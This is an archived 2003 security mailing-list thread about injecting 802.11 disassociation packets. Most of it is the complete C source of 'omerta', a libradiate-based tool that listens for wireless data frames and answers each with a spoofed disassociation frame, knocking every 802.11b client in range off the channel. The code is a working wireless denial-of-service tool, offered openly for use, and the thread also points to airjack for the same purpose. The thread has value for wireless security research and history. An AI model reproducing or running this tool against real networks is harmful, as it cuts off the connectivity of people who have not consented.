Libnet
RE: 802.11 deassociation packet Jun 23 2003 12:08AM
Lampe, John W. (JWLAMPE GAPAC com) (2 replies)
RE: 802.11 deassociation packet Jun 26 2003 11:44PM
Vaidehi Kasarekar (vaidehi_30 yahoo com) (1 replies)
RE: 802.11 deassociation packet Jun 27 2003 01:37PM
Bruno Morisson (morisson genhex org)
RE: 802.11 deassociation packet Jun 23 2003 12:11AM
Mike Schiffman (mike infonexus com)
I think it's probably a non-issue for me to release this now.
Libradiate isn't really supported anymore so if you can't get it to
build, I don't know what to tell ya...

/*
* $Id$
*
* omerta (silence)
* omerta.c - Disassociates all 802.11 network connections within range
on
* the same channel as the card in the machine. Built on
top of
* libradiate.
*
* NOT FOR DISTRIBUTION
*
* Copyright (c) 2002 Mike D. Schiffman <mike (at) stake (dot) com [email concealed]>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
the
* documentation and/or other materials provided with the
distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS''
AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE
LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
OF
* SUCH DAMAGE.
*
*/

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <errno.h>

#include <radiate.h>

void eprintf(u_char *);
void do_ioctl(char *, radiate_t *r);

int
main(int argc, char **argv)
{
int c, n;
u_short data;
radiate_t *r;
u_char *rbuf, *wbuf;
struct hfa384x_tx_frame tx_h;
struct hfa384x_rx_frame *rx_h;
char err_buf[RADIATE_ERRBUF_SIZE];

/* r = radiate_init(RADIATE_VERBOSE, err_buf); */
r = radiate_init(0, err_buf);
if (r == NULL)
{
fprintf(stderr, "radiate_init(): %s", err_buf);
return (EXIT_FAILURE);
}

printf("Omerta [802.11b network silencer]\n");
printf("Listening for 802.11b data frames...\n");

/* ensure monitor mode is on */
do_ioctl("1", r);

for (n = 0;;)
{
/* read a frame from the ether */
c = radiate_read(&rbuf, r);
if (c == -1)
{
fprintf(stderr, "radiate_read(): %s", radiate_geterror(r));
return (EXIT_FAILURE);
}
if (c < sizeof (struct hfa384x_rx_frame))
{
fprintf(stderr, "Short frame (%d bytes).\n", c);
continue;
}
rx_h = (struct hfa384x_rx_frame *)rbuf;

/* ensure it is a data frame */
/* don't worry about endianess since we're on a small box */
if (RADIATE_GET_TYPE(rx_h->frame_control) != RADIATE_TYPE_DATA)
{
continue;
}

/* build a disassociation frame; data first */
/* don't worry about endianess since we're on a small box */
data = RADIATE_REASON_UNSPECIFIED;

/*
* Build the 802.11 management header.
* Remember we have to free this buffer when we're done with
it.
*/
wbuf = radiate_build_mgmt_frame(
rx_h->addr1, /* source MAC */
rx_h->addr2, /* destination MAC */
rx_h->addr3, /* BSSID */
RADIATE_MGMT_STYPE_DISASSOC, /* MGMT frame subtype */
RADIATE_CTRL_TODS, /* control flags */
(u_char *)&data, /* payload */
sizeof (data), /* payload size */
r); /* radiate context */

/* it's that simple */
c = radiate_write(wbuf, sizeof (tx_h) + sizeof (data), r);
if (c == -1)
{
fprintf(stderr, "radiate_write(): %s", radiate_geterror(r));
}
else if ((r->flags) & RADIATE_VERBOSE)
{
fprintf(stderr, "%03d [", ++n);
eprintf(rx_h->addr1);
fprintf(stderr, "] <");
eprintf(rx_h->addr2);
fprintf(stderr, "> [");
eprintf(rx_h->addr3);
fprintf(stderr, "]\n");
}
else
{
fprintf(stderr, "Hush: %d\r", ++n);
}
free(wbuf);

/* we need to do these ioctls for some reason to reset the card
*/
do_ioctl("0", r);
do_ioctl("1", r);
}
/* NOTREACHED */
radiate_destroy(r);

return (EXIT_SUCCESS);
}

void
eprintf(u_char *e)
{
fprintf(stderr, "%02x:%02x:%02x:%02x:%02x:%02x",
e[0], e[1], e[2], e[3], e[4], e[5]);
}

void
do_ioctl(char *mode, radiate_t *r)
{
int c;
struct timespec t;

t.tv_sec = 0;
t.tv_nsec = 500000;

for (c = -1; c == -1; )
{
c = radiate_set_mm(mode, r);
if (c == -1 && (r->flags) & RADIATE_VERBOSE)
{
fprintf(stderr, "radiate_set_mm(): %s",
radiate_geterror(r));
}
nanosleep(&t, NULL);
}
}

/* EOF */

--
Mike Schiffman, CISSP
http://www.packetfactory.net/schiffman.html

-----Original Message-----
From: Lampe, John W. [mailto:JWLAMPE (at) GAPAC (dot) com [email concealed]]
Sent: Sunday, June 22, 2003 5:09 PM
To: 'Andrew Hintz (Drew)'; vaidehi kasarekar
Cc: libnet (at) securityfocus (dot) com [email concealed]
Subject: RE: 802.11 deassociation packet

libradiate *can* do it. I wrote a disassociate tool a while back (I'll
see if I can find it) which had a few bugs which I never bothered to
fix...but, I know it can be done...I disassociated all of my home
machines...

Someone told me that I should have written it to disassociate broadcasts
(which I was filtering out)...

if yo don't find somethin better, shoot me an email and I'll post it.

Hey Mike, what about omerta?

John

> -----Original Message-----
> From: Andrew Hintz (Drew) [mailto:drew (at) overt (dot) org [email concealed]]
> Sent: Sunday, June 22, 2003 7:50 PM
> To: vaidehi kasarekar
> Cc: libnet (at) securityfocus (dot) com [email concealed]
> Subject: RE: 802.11 deassociation packet
>
>
> > I am working in wireless security. I want to inject a 802.11
> > deassociation packet in the network. any guidelines of how
> do i do it
> > would be really very useful
>
> I'm not sure if libnet can do it, but I know airjack can.
> Take a look at
> the source...
>
> <http://802.11ninja.net/>
>
> <http://www.blackhat.com/presentations/bh-usa-02/baird-lynn/ai
rjack-v0.6.2-a
lpha.tar.bz>

--
^Drew

http://guh.nu

--Begin PGP Fingerprint--
3C6C F712 0A52 BD33 C518 5798 9014 CA99 2DA0 5E78
--End PGP Fingerprint--

---------------------------------------------------------------------
To unsubscribe, e-mail: libnet-unsubscribe (at) securityfocus (dot) com [email concealed]
For additional commands, e-mail: libnet-help (at) securityfocus (dot) com [email concealed]

---------------------------------------------------------------------
To unsubscribe, e-mail: libnet-unsubscribe (at) securityfocus (dot) com [email concealed]
For additional commands, e-mail: libnet-help (at) securityfocus (dot) com [email concealed]

---------------------------------------------------------------------
To unsubscribe, e-mail: libnet-unsubscribe (at) securityfocus (dot) com [email concealed]
For additional commands, e-mail: libnet-help (at) securityfocus (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus